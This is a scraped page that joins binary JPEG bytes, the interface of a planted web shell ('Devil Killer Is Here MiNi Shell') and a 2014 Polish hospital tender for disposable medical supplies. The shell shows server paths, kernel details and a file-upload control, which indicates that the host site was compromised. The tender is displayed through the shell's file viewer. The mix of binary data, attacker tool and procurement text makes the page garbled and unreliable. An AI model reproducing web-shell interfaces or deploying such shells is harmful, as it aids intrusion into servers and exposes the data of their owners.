JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140502/95089-N-2014.html

<p class="kh_header"><b>Bochnia: Dostawa sprzętu jednorazowego 
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy 
im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 95089 - 2014; data zamieszczenia: 02.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego 
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy 
im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.1)	Przedmiotem zamówienia jest:
Dostawa sprzętu jednorazowego dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej opisanych w sposób szczegółowy w załączniku 3 do SIWZ
II.1.2)	Przedmiot zamówienia został podzielony na 45 pakietów
Pakiet nr 1 - Igły, strzykawki,  przyrządy do przetaczania płynów i krwi
Pakiet nr 2 - Rękawice
Pakiet nr 3 - Opakowania na zużyte igły i strzykawki
Pakiet nr 4 - Ginekologiczny sprzęt jednorazowy
Pakiet nr 5 - Staplery do zespoleń jelitowych, zestawy drenażowe
Pakiet nr 6 - Igły do znieczuleń, zestaw do kaniulacji, katetery*
Pakiet nr 7 - Kaniule, kraniki, igły bezpieczne, igły do penów, zamknięte systemy*
Pakiet nr 8 - Cewniki, maski tlenowe, elektrody do stymulacji serca, sonda*
Pakiet nr 9 - Rurki intubacyjne,  rurki tracheostomijne i ustno-gardłowe
Pakiet nr 10 - Dreny
Pakiet nr 11 - Ostrza, elektrody oraz inny  sprzęt jednorazowy
Pakiet nr 12 - Zestaw do tracheostomii przezskórnej 
Pakiet nr 13 - Katurki ochronne
Pakiet nr 14 - Worki stomijne, pasta i puder
Pakiet nr 15 - Zestaw do pomp, wapno granulowane
Pakiet nr 16 - Filtry, sztuczny nos, obwody anestezjologiczne
Pakiet nr 17 - Klipsy do klipsownicy, filtry do duomatu
Pakiet nr 18 - Troakary do laparoskopii
Pakiet nr 19 - Maski ochronne
Pakiet nr 20 - Akcesoria do fototerapii
Pakiet nr 21 - Akcesoria do fototerapii, dezynfekcji parowej oraz do podowania pokarmu niemowlętom
Pakiet nr 22 - Mikrokuwety
Pakiet nr 23 - Test do wykrywania Helicobacter pyroli
Pakiet nr 24 - Produkty medyczne jednorazowego użytku do laparoskopii
Pakiet nr 25 - Paski wskaźnikowe
Pakiet nr 26 - Ustniki, głowica
Pakiet nr 27-System ssący
Pakiet nr 28 - Łyżki sterylne jednorazowego użytku do laryngoskopów światłowodowych i standartowych 
Pakiet nr 29 - Akcesoria pomocnicze do nCPAP Infant Flow
Pakiet nr 30 -  Wkłady do strzykawki automatycznej 
Pakiet nr 31 - Materiały okulistyczne
Pakiet nr 32 - Układ oddechowy dla noworodka*
Pakiet nr 33 - Rękawice do ochrony przed promieniami rentgenowskimi
Pakiet nr 34 - Akcesoria do pulsoksymetru 
Pakiet nr 35 - Różny sprzęt jednorazowego użytku
Pakiet nr 36 -  Rurki krtaniowe jednorazowe i wielorazowe
Pakiet nr 37 - Rurki do podawania surfaktantu
Pakiet nr 38 - Zestaw do toalety jamy ustnej i pobierania próbek
Pakiet nr 39 - Igła do skleroterapii
Pakiet nr 40- Igły do systemu dostępu doszpikowego EZ-IO
Pakiet nr 41 - Igła do stymulatora HNS 12
Pakiet nr 42 - Pojemniki histopatologiczne
Pakiet nr 43 - Naczynia sanitarne jednorazowego użytku
Pakiet nr 44 - Dreny
Pakiet nr 45 - Sterylne akcesoria na blok operacyjny.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 45.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie Wykonawcy o dopuszczeniu wyrobów medycznych do obrotu i stosowania na terenie Polski (według załącznika nr 6).
III.5.2)	Karta katalogowa lub folder w j. polskim - ze zdjęciem/rysunkiem pozwalająca Zamawiającemu na stwierdzenie spełniania wymaganych parametrów - każda strona musi zostać opisana którego pakietu i pozycji dotyczy.
III.5.3)	Wzory - próbki dla pakietu nr 2, nr 4 - poz.1,3, nr 7, nr 20 - poz. 1, nr 35 - poz. 12, 13  zaopatrzone w oryginalne etykiety producenta lub potwierdzone kopie oznakowane numerem pakietu i pozycji w pakiecie (po 1 sztuce) wraz z wypełnionym wykazem próbek oferowanych produktów (według załącznika nr 7). Na wniosek Wykonawców, których oferty nie zostaną wybrane, Zamawiający zwróci próbki.
III.5.4)	Deklaracja zgodności CE producenta - potwierdzająca zgodność z normami dla pakietu nr 2.
III.5.5)	Badania jednostki niezależnej na przenikalność substancji chemicznych wg EN 374-3, badania na przenikanie wirusów zgodnie z normą ASTMF-1671 dla pakietu nr 2 poz.2, 5.
III.5.6)	Certyfikat jednostki notyfikującej potwierdzający zgodność z normą EN-455 1.2.3 oraz z normą ASTM F 1671 dla pakietu nr 2 poz. 10.

Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez  Wykonawcę
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg zasady: spełnia/ nie spełnia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
III.6.2)	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów.
III.6.3)	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1).	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2).	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	Numeru katalogowego Towaru,
b)	nazwy Towaru przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania.
3).	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową.
4).	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatku VAT.  
5).	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny.
6).	Zaistnienie okoliczności wymienionych w ust  5  nie wymaga sporządzenia aneksu.
7).	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj.:
a)	zakończenia produkcji Towaru
b)	wygaśnięcia rejestracji Towaru
8).	Na potwierdzenie okoliczności, o których mowa w ust. 7 a), b) Wykonawca przedstawi zawiadomienie producenta lub stosownego organu.
9).	Wykonawca w sytuacji określonej w ust.7 a), b), w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej. 
10).	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, im. bł. Marty Wieckiej. Dział Zaopatrzenia i Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2014 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Igły, strzykawki,  przyrządy do przetaczania płynów i krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igła iniekcyjna	0,45 x 16	op.	4
2.	Igła iniekcyjna	0,5 X 25	op.	127
3.	Igła iniekcyjna	0,6 X 30	op.	75
4.	Igła iniekcyjna	0,7 X 30	op.	123
5.	Igła iniekcyjna	0,8 X 40	op.	671
6.	Igła iniekcyjna	0,9 X 40	op.	794
7.	Igła iniekcyjna	1,1 X 40	op.	55
8.	Igła iniekcyjna	1,2 X 40	op.	850
9.	Igła do punkcji	1,8 x 40-50	op.	1
10.	Igła do punkcji	2,1 x 40-50	op.	1
11.	Igła 	0,45 x 23	op.	1
12.	Strzykawka dwuczęściowa	2 ml	op.	490
13.	Strzykawka dwuczęściowa	5 ml	op.	963
14.	Strzykawka dwuczęściowa	10 ml	op.	762
15.	Strzykawka dwuczęściowa	20 ml	op.	737
16.	Strzykawka do pomp infuzyjnych	50 ml	szt.	1260
17.	Strzykawka do pomp infuzyjnych	50 - 60ml	szt.	1105
18.	Strzykawka Janeta	100  ml 	szt.	3759
19.	Strzykawka do TBC	1 ml	op.	16,77
20.	Strzykawka insulinowa	1 ml	op	1
21.	Strzykawka  trzyczęściowa 	3 ml	op	9
22.	Strzykawka  trzyczęściowa 	10 ml	op	6
23.	Strzykawka  trzyczęściowa 	20 ml	op	1
24.	Przyrząd  do przetaczania  krwi,	xxxxxxxxxxx	szt.	1665
25.	Przyrząd do przetaczania płynów infuzyjnych	xxxxxxxxxxx	szt.	74000
26.	Przyrząd do szybkiego przetaczania krwi	xxxxxxxxxxx	szt.	3
27.	Przyrząd do przetaczania płynów	xxxxxxxxxxx	szt.	112
28.	Aparat do przepływu infuzji	xxxxxxxxxxx	szt.	1000
29.	Zestaw do transfuzji wymiennej noworodków	xxxxxxxxxxx	szt.	1
30.	Zestaw do szybkiej infuzji krwi i płynów	pojemność 500 ml	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Rękawice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękawice diagnostyczne lateksowe niesterylne, lekko pudrowane	S	op.
		M	op.
		L	op.
2.	Rękawice diagnostyczne winylowe	S	op.
		M	op.
		L	op.
3.	Rękawice diagnostyczne sterylne lateksowe, bezpudrowe	Nr 6	par
		Nr 6,5	par
		Nr 7	par
		Nr 7,5	par
		Nr 8	par
		Nr 8,5	par
4.	Rękawice diagnostyczne lateksowe niesterylne, bezpudrowe	S	op.
		M	op.
		L	op.
5.	Rękawice diagnostyczne nitrylowe bezpudrowe	S	op.
		M	op.
		L	op.
6.	Rękawice diagnostyczne sekcyjne	Nr 8	para
7.	Rękawice diagnostyczne, ginekologiczne	Nr S	para
8.	Rękawice diagnostyczne, ginekologiczne	Nr M 	para
9.	Rękawice diagnostyczne, ginekologiczne	Nr L	para
10.	Rękawice chirurgiczne sterylne lateksowe bezpudrowe niechlorowane	Nr 6,0	para
		Nr 6,5	para
		Nr 7,0	para
		Nr 7,5	para
		Nr 8,0	para
		Nr 8,5	para
11.	Rękawice chirurgiczne, system podwójnego zakładania	Nr 6,0	para
		Nr 6,5	para.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Opakowania na zużyte igły i strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki jednorazowego użytku na odpady medyczne	
10 L	szt.	8140,
5 L	szt.	2140,
2 L wys. 20-23 cm, śr.górna 12-12,5 cm,  śr. dolna 10,5-11 	szt.	2180,
1 L wys. 12-13 cm,   śr.górna 11-12 cm, śr. dolna 10-11	szt.	840,
20 L OTWÓR O ŚREDNICY minimum 12 cm	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Ginekologiczny sprzęt jednorazowy.</p>
